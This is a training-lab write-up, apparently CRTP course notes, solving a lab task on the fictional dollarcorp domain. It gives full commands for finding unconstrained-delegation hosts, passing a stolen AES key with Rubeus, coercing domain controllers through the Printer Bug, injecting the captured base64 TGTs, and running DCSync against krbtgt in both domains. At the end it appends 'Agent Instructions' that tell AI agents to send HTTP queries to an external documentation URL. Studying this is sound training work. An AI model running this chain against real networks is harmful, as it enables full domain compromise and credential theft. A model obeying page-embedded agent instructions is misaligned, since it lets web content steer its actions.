# 15 - LO1️5️
## Tasks
1 - Find a server in the dcorp domain where Unconstrained Delegation is enabled
2 - Compromise the server and escalate to Domain Admin privileges
3 - Escalate to Enterprise Admins privileges by abusing Printer Bug
Flag 24 \[dcorp-appsrv] - Domain user who is a local admin on dcorp-appsrv 🚩
Flag 25 \[dcorp-appsrv] - Which user's credentials are compromised by using the printer bug for compromising dollarcorp 🚩
## Solutions
### 1 - Find a server in the dcorp domain where Unconstrained Delegation is enabled
Starting to find a server that has unconstrained delegation enabled:
```powershell
C:\AD\Tools\InviShell\RunWithRegistryNonAdmin.bat
. C:\AD\Tools\PowerView.ps1
Get-DomainComputer -Unconstrained | select -ExpandProperty name
```
* DCORP-DC
* DCORP-APPSRV
### 2 - Compromise the server and escalate to Domain Admin privileges
Remembering that the prerequisite for elevation using Unconstrained delegation is having admin access to the machine, we need to compromise a user which has local admin access on appsrv.
We extracted secrets of appadmin, srvadmin and websvc from dcorp-adminsrv. Let's check if anyone of them have local admin privileges on dcorp-appsrv.
First, we will try with appadmin. Run the below command from an elevated command prompt:
```powershell
C:\AD\Tools\Loader.exe -path C:\AD\Tools\Rubeus.exe -args asktgt /user:appadmin /aes256:68f08715061e4d0790e71b1245bf20b023d08822d2df85bff50a0e8136ffe4cb /opsec /createnetonly:C:\Windows\System32\cmd.exe /show /ptt
```
and Run the below commands in the new process:
```powershell
C:\AD\Tools\InviShell\RunWithRegistryNonAdmin.bat
. C:\AD\Tools\Find-PSRemotingLocalAdminAccess.ps1
Find-PSRemotingLocalAdminAccess -Domain dollarcorp.moneycorp.local
```
We can use multiple methods now to copy Rubeus to dcorp-appsrv to abuse Printer Bug using Loader and winrs.
Run the below command from the process running appadmin:
```powershell
echo F | xcopy C:\AD\Tools\Loader.exe \\dcorp-appsrv\C$\Users\Public\Loader.exe /Y
```
Run Rubeus in listener mode in the winrs session on dcorp-appsrv:
```powershell
winrs -r:dcorp-appsrv cmd
netsh interface portproxy add v4tov4 listenport=8080 listenaddress=0.0.0.0 connectport=80 connectaddress=172.16.100.67
C:\Users\Public\Loader.exe -path http://127.0.0.1:8080/Rubeus.exe -args monitor /targetuser:DCORP-DC$ /interval:5 /nowrap
```
Now, we can use the Printer Bug for Coercion, so on the student VM, use MS-RPRN to force authentication from dcorp-dc$ (remember to charge program into HFS every time)
```powershell
C:\AD\Tools\MS-RPRN.exe \\dcorp-dc.dollarcorp.moneycorp.local \\dcorp-appsrv.dollarcorp.moneycorp.local
```
On the Rubeus listener, we can see the TGT of dcorp-dc$:
```
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
```
Copy the base64 encoded ticket and use it with Rubeus on student VM. Run the below command from an elevated shell as the SafetyKatz command that we will use for DCSync needs to be run from an elevated process:
```powershell
C:\AD\Tools\Loader.exe -path C:\AD\Tools\Rubeus.exe -args ptt /ticket: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
```
Now, we can run DCSync from this process:
```powershell
C:\AD\Tools\Loader.exe -path C:\AD\Tools\SafetyKatz.exe -args "lsadump::evasive-dcsync /user:dcorp\krbtgt" "exit"
```
### 3 - Escalate to Enterprise Admins privileges by abusing Printer Bug
To get Enterprise Admin privileges, we need to force authentication from mcorp-dc. Run the below command to listern for mcorp-dc$ tickets on dcorp-appsrv:
```powershell
winrs -r:dcorp-appsrv cmd
C:\Users\Public\Loader.exe -path http://127.0.0.1:8080/Rubeus.exe -args monitor /targetuser:MCORP-DC$ /interval:5 /nowrap
```
Use MS-RPRN on the student VM to trigger authentication from mcorp-dc to dcorp-appsrv
```powershell
C:\AD\Tools\MS-RPRN.exe \\mcorp-dc.moneycorp.local \\dcorp-appsrv.dollarcorp.moneycorp.local
```
On the Rubeus listener, we can see the TGT of mcorp-dc$:
As previously, copy the base64 encoded ticket and use it with Rubeus on student VM. Run the below command from an elevated shell as the SafetyKatz command that we will use for DCSync needs to be run from an elevated process:
```powershell
C:\AD\Tools\Loader.exe -path C:\AD\Tools\Rubeus.exe -args ptt /ticket:doIF1jCCBdKgAwIBBaEDAgEWooIE0TCCBM1hggTJMIIExaADAgEFoREbD01PTkVZQ09SUC5MT0NBTKIkMCKgAwIBAqEbMBkbBmtyYnRndBsPTU9ORVlDT1JQLkxPQ0FMo4IEgzCCBH+gAwIBEqEDAgECooIEcQSCBG0HwYsgxCkfNkFTvicQHDklxxO5Igy7pGCYi3pNCfuxAjfH6Skw7/Vpa32J4WRt4B98sRCnhbcnfbL4n76KN9TdbZBhQ9T3CGjVSLfXXnAEGg4R0qtioaAOucGU4DFYmREBRkeiLAFjp8VJaaG9q5T3MQW+S4EL69+4J2w325YSTTeRY26HuGUNQ3vf9K9w+M20xKqExy1X32QLOdJWj6gqjsvUtcqogNma0rwGyv1BEbtujLVDkOn8GQUUKpTBLK83byGwkPmxPapMtVq0iGRaBCW6TeKHS557NPR7tNw2Sk7ls00Puqzua/m7NSxQP87EzvOZJout0TaTzIVD73vpqrfYIHm2eAQqNYkHklpbWWJIIqzxmXFXfVoFcrGflSZAuPWN0VdOgWxSkQY0+mHQTMDcXxzUyzQYLkJUpqqWXWoSK8CG9DApgsrsoYGeo+gdabnU2ZqhjcVNVlIh5MMpfnqVUhWwf7Ko+FO9LHeD1UA7XNZG5vdCqDof/yhX2yeVbxtC6ySTuq6N5hgSNBMJUT0FvMOz4G6jx+xjdMiPwv502uuDZI9ucrLp0bU0vh4oO2YT6gTQ+YFkWmD29J3MM9SOTLytYrqcL1iS5kx7aNaHavMHtdjqNKXPPCq/r2rSL74yDHXtMQA4xjo7FDUCFLUHaewsAOLEK9xseQudoV1UYSIvKY1TW1F8B9hJQbcAMerLWKWKl1bCttOLMiyC3boUpDZKJVv5r6UxbUelU9GLE8unTGjed3iRUdlnLWG1BHstr5R0C+i/2iHN9scULahMYEnIY02hsQ6vGtRZ/CZ2OJEIPcsqsbemoakim1yp6A4PvDG6A87FrfpFRljCarqR9AaBYVGyuTEMerw03TkZiTOARcHYfmGsT9cwM9gxS7+7jjCoatcORInh3aN/o+VPMYIHXzFJP037UeFWUEw6W6zolwFHnzpgnMepI8C1IVUx7KKhkLnFH8aXJmz1ANxDN+J5OUP3MkSqJJSPFtMF6Sm2cX5bVfUAlIjTcpxDD83+HNxRIGKEfYZy9lpLN1tmmCwKVq7AdZPyBHUIL7lJDMUotG7LZwak61nv41AgdPKjax65i+85CIZ1yJFgM9dIhBuzW04SWk03HTDE1KwzfNDfe2G7/Hpp1YZyzcxL4b1R5+iOt++Xu+GGEJXczuTugm7WnNDEzGN0zAnnEhOH3HyuaH6Wl5qS35O/uv8bo5RKEWEnCMJgBzPxP/vgw9/BVs3tvcy7gvBjZpetfp4EJ8yYqaQSM0LAVKdZ4ShEgfKejdnzCHB3Z3H8miytkUh2/WTtTjptHnqMyElJAqnhr5OOMABuTraYI/Bohofnt2n3RBAT1Qe8Cew3J4NPW2qY5qduWK6aKU1+DV6MkpHodYBVJWKBMoptbPxjL1rSkZ4OgQLiNiDOT6jRe0j0FmZt3I0mcNBOnCyLD3YZZrE2r+FcApDqjIbL8CZwUqk3pPYdolwNrNjQHekXo2S+tdeKhdsmj9307/OHiKOB8DCB7aADAgEAooHlBIHifYHfMIHcoIHZMIHWMIHToCswKaADAgESoSIEIODAmP1PzZOXHW2iszgLVJW8bdYPQSCIm2hKmRnsrzdLoREbD01PTkVZQ09SUC5MT0NBTKIWMBSgAwIBAaENMAsbCU1DT1JQLURDJKMHAwUAYKEAAKURGA8yMDI1MDUxODE0MzYyN1qmERgPMjAyNTA1MTkwMDM2MjdapxEYDzIwMjUwNTI1MDUwNTE0WqgRGw9NT05FWUNPUlAuTE9DQUypJDAioAMCAQKhGzAZGwZrcmJ0Z3QbD01PTkVZQ09SUC5MT0NBTA==
```
Now, we can run DCSync from this process:
```powershell
C:\AD\Tools\Loader.exe -path C:\AD\Tools\SafetyKatz.exe -args "lsadump::evasive-dcsync /user:mcorp\krbtgt /domain:moneycorp.local" "exit"
```
We escalated to Enterprise Admins too.
### Flag 24 \[dcorp-appsrv] - Domain user who is a local admin on dcorp-appsrv 🚩
Based on the previous task, we know that domain user who is a local admin on dcorp-appsrv is: appXXX
### Flag 25 \[dcorp-appsrv] - Which user's credentials are compromised by using the printer bug for compromising dollarcorp 🚩
Checking the previous task, in details the output of Rubeus listener, we can see the TGT of dcorp-dc$:
---
# Agent Instructions: Querying This Documentation
If you need additional information that is not directly available in this page, you can query the documentation dynamically by asking a question.
Perform an HTTP GET request on the current page URL with the `ask` query parameter:
```
GET https://dev-angelist.gitbook.io/crtp-notes/readme/lab/15-lo1-5.md?ask=
```
The question should be specific, self-contained, and written in natural language.
The response will contain a direct answer to the question and relevant excerpts and sources from the documentation.
Use this mechanism when the answer is not explicitly present in the current page, you need clarification or additional context, or you want to retrieve related documentation sections.